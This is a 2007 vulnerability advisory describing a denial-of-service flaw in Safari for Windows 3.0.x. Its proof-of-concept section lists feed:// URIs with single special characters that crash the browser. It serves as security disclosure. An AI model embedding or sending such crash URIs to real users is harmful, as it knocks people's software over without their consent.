Date: Jun 12 2007
Class: Input Validation Error
Local: Yes
Remote: Yes
Vulnerable Versions:
- Apple Safari for Windows 3.0.0
- Apple Safari for Windows 3.0.1
Note: MacOS X versions not tested.
Info:
Apple Safari is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to cause denial-of-service conditions on a users computer.
Proof of Concept
feed://% DoS
feed://" DoS
feed://\ DoS
feed://{ DoS
feed://} DoS
feed://< DoS
feed://> DoS
feed://^ DoS
feed://` DoS
feed://| DoS
Of course any feed:// URI with one of these characters will cause a denial-of-service condition.
Note that this exploit works only for feed:// links, it doesn’t work with http://, ftp:// gopher:// and etc’. Weird.
Disclosure:
Vendor has been informed.
Solution:
No solution. Use other browsers.
Credit: Trancer